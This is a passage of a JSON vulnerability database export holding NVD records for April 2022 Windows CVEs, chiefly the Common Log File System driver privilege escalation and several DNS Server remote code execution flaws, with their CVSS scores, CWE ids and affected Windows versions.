["cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:27:51", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-24521.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-24481", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24481", "CVE-2022-24521"], "modified": "2022-04-22T16:46:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2022-24481", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24481", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:34:10", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26821", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-18T19:49:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2022-26821", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26821", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:34:10", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26820", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-18T19:50:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2022-26820", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26820", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:34:11", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26826", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-18T19:18:00", "cpe": ["cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1607"], "id": "CVE-2022-26826", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26826", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:34:11", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26829", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-18T19:17:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2008:sp2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2022-26829", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26829", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:r2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:standard:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:sp2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:34:08", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26812", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-18T20:23:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2022-26812", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26812", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:34:09", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26815", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-18T20:14:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2022-26815", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26815", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:34:09", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26814", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-18T20:15:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2"], "id": "CVE-2022-26814", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26814", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:34:10", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26818", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", 